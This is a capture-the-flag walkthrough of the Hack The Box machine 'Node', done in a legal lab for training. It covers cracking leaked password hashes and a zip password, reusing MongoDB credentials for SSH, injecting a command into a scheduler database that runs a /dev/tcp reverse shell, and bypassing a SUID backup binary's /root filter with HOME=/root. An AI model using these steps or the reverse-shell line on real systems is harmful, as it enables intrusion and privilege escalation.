Node

tags: HTB Medium Linux OSCP

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:26 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 92.74 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,3000 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:27 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.86 ms 10.10.14.1
2   93.88 ms 10.10.10.58

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

Port 3000

On port 3000 there is a web server. Looking at the source code of the website, we find several JavaScript resources.
Inside the admin.js file we can see that it makes a GET request to the URL /api/admin/backup.

var controllers = angular.module('controllers');

controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
  $scope.backup = function () {
    $window.open('/api/admin/backup', '_self');
  }

  $http.get('/api/session')
    .then(function (res) {
      if (res.data.authenticated) {
        $scope.user = res.data.user;
      }
      else {
        $location.path('/login');
      }
    });
});

When accessing the URL we can find 3 user accounts with their respective hashes.

Using the website crackstation we can get the passwords for tom and mark in plain text.

tom:spongebob
mark:snowflake
rastating:Can’t decrypt it

On the other hand, inside the profile.js file we can find the URL api/users.

var controllers = angular.module('controllers');

controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
  $http.get('/api/users/' + $routeParams.username)
    .then(function (res) {
      $scope.user = res.data;
    }, function (res) {
      $scope.hasError = true;

      if (res.status == 404) {
        $scope.errorMessage = 'This user does not exist';
      }
      else {
        $scope.errorMessage = 'An unexpected error occurred';
      }
    });
});

By accessing the URL api/users we obtain the 3 previous accounts plus a new one: the user myP14ceAdm1nAcc0uNT, with its hash, who is also an administrator, as the field is_admin: true shows.

And again we can get the password in plain text using the crackstation service.

myP14ceAdm1nAcc0uNT:manchester

Now that we have a user with administrator permissions, we are going to authenticate on the website.
As we can see, we can download a Backup file.

Let's see its content.

# cat myplace.backup | base64 -d > myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
root [EvilBook] (10.10.14.7) ~/Descargas
# mv myplace myplace.zip

Exploitation

Fcrackzip

The zip file is password protected, but we can try to get it using fcrackzip.

# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip
possible pw found: magicword ()

Great, now we can extract the content.

# unzip myplace.zip
Archive:  myplace.zip
[myplace.zip] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
   creating: var/www/myplace/node_modules/
   creating: var/www/myplace/node_modules/serve-static/
  inflating: var/www/myplace/node_modules/serve-static/README.md
.................................................................
.................................................................

The extracted content is a copy of the web application. Analyzing its files, in the first lines of app.js we find the MongoDB credentials of the user mark.

const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

Maybe they will help us to connect by SSH.

SSH

And we are in via SSH with the credentials we found, mark:5AYRft73VtFpc84k!

Post exploitation

SUID

Let's see what we have with the SUID bit set.

[email protected]:~$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount

The /usr/local/bin/backup binary has the SUID bit set, but we cannot execute it as mark.

Running process

Let's see what processes tom has running.

[email protected]:~$ ps -ef | grep tom
mark       612   596  0 07:43 pts/0    00:00:00 grep --color=auto tom
tom       1229     1  0 Mar25 ?        00:00:07 /usr/bin/node /var/scheduler/app.js
tom       1232     1  0 Mar25 ?        00:00:07 /usr/bin/node /var/www/myplace/app.js
tom      18349  1229  0 Mar25 ?        00:00:00 /bin/sh -c /bin/bash /tmp/shell.sh
tom      18350 18349  0 Mar25 ?        00:00:00 /bin/bash /tmp/shell.sh
tom      18351 18350  0 Mar25 ?        00:00:00 sh -i
tom      18356 18351  0 Mar25 ?        00:00:00 /bin/bash
tom      18358 18356  0 Mar25 ?        00:00:00 python3 -c import pty; pty.spawn('/bin/bash')
tom      18359 18358  0 Mar25 pts/2    00:00:00 /bin/bash

tom is running another Node application, /var/scheduler/app.js. Let's see its content.

const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});

As the code shows, the application reads every document in the tasks collection of the scheduler MongoDB database, passes the cmd field of each one to exec(), and then deletes the document. The interval of 30000 means the whole process repeats every 30 seconds.

We should be able to connect to the database and insert a new record with a command to run a reverse shell that we have saved in a script.

Privilege escalation

The first thing we need to do is start a listener in a terminal and create the script containing the reverse shell.

[email protected]:/tmp$ cat shell.sh
sh -i >& /dev/tcp/10.10.14.7/8787 0>&1

Now, we have to connect to the scheduler database and insert a new record that executes our script. Inserting {cmd:"/bin/bash /tmp/shell.sh"} should work.

[email protected]:/home/tom$ mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
2021-03-25T19:45:26.389+0000 E QUERY    [thread1] SyntaxError: expected expression, got '&' @(shell):1:7

> db.tasks.find()
> db.tasks.insert({cmd:"/bin/bash /tmp/shell.sh"});
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("605ce5e877be912640c6765d"), "cmd" : "/bin/bash /tmp/shell.sh" }
>

We just have to wait a few seconds... and we have a shell!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.58] 32886
sh: 0: can't access tty; job control turned off
$

Perfect, now we can read the user flag inside the tom home.

[email protected]:~$ cat user.txt
CENSORED_FLAG

Root flag

Now that we are tom, we can run the SUID backup we found earlier.

As we can see in the app.js file from the website backup, the binary is invoked as /usr/local/bin/backup followed by -q, a key, and the path to back up.

app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

      proc.on("exit", function(exitCode) {
        res.header("Content-Type", "text/plain");
        res.header("Content-Disposition", "attachment; filename=myplace.backup");
        res.send(backup);
      });

      proc.stdout.on("data", function(chunk) {
        backup += chunk;
      });

      proc.stdout.on("end", function() {
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

We are going to ask it to make a backup of the /root directory. We must remember that the result will be a base64-encoded zip file.

[email protected]:~$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "/root"
 [+] Finished! Encoded backup is below:

[base64-encoded backup output omitted]

Let's decode it.

# echo "[base64-encoded backup output]" | base64 -d > root.zip

In this case, unzip is not working so we are going to use 7za. The password to unzip is magicword which is the same as we cracked earlier.

# 7za x root.zip

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)

Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141

Enter password (will not be echoed):
Everything is Ok

Size:       2584
Compressed: 1141

Unzipping it gives us the file root.txt. Let's read the flag.

# cat root.txt
[ASCII-art troll face instead of the flag]

Wow, we've been trolled!

Let's analyze the flow of the program with ltrace.

[email protected]:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xffea6174, 0x80492c0 <unfinished ...>
geteuid()                                                                                                                                        = 1000
setuid(1000)                                                                                                                                     = 0
strcmp("-q", "-q")                                                                                                                               = 0
strncpy(0xffea6038, "45fac180e9eee72f4fd2d9386ea7033e"..., 100)                                                                                  = 0xffea6038
strcpy(0xffea6021, "/")                                                                                                                          = 0xffea6021
strcpy(0xffea602d, "/")                                                                                                                          = 0xffea602d
strcpy(0xffea5fb7, "/e")                                                                                                                         = 0xffea5fb7
strcat("/e", "tc")                                                                                                                               = "/etc"
strcat("/etc", "/m")                                                                                                                             = "/etc/m"
strcat("/etc/m", "yp")                                                                                                                           = "/etc/myp"
strcat("/etc/myp", "la")                                                                                                                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                                                                                                                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                                                                                                                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                                                                                                                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                                                                                                                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                                                                                                                  = 0x95e7008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...)                                                             = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...)                                                             = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...)                                                             = 1
fgets("\n", 1000, 0x95e7008)                                                                                                                     = 0xffea5bcf
strcspn("\n", "\n")                                                                                                                              = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "")                                                                                                = 1
fgets(nil, 1000, 0x95e7008)                                                                                                                      = 0
strstr("/root", "..")                                                                                                                            = nil
strstr("/root", "/root")                                                                                                                         = "/root"
strcpy(0xffea4c08, "Finished! Encoded backup is belo"...)                                                                                        = 0xffea4c08
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:

)                                                           = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...[base64-encoded backup output omitted]
)                                                                                                      = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
[email protected]:/$

So the binary checks whether the requested path contains /root, as we can see in strstr("/root", "/root"). No problem: we can get around it by setting tom's HOME environment variable to /root and then asking the binary to back up tom's home directory with ~.

[email protected]:/$ export HOME=/root
[email protected]:/$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
[base64-encoded backup output omitted]

We decode the result from base64 back to zip and unzip it.

# echo "[base64-encoded backup output]" | base64 -d > root.zip
# 7za x root.zip

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3858 bytes (4 KiB)

Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 3858

Enter password (will not be echoed):
Everything is Ok

Folders: 3
Files: 7
Size:       4268
Compressed: 3858

And again, let's read the root flag!

# ls
root  root.zip
# cd root
# ls
root.txt
# cat root.txt
CENSORED_FLAG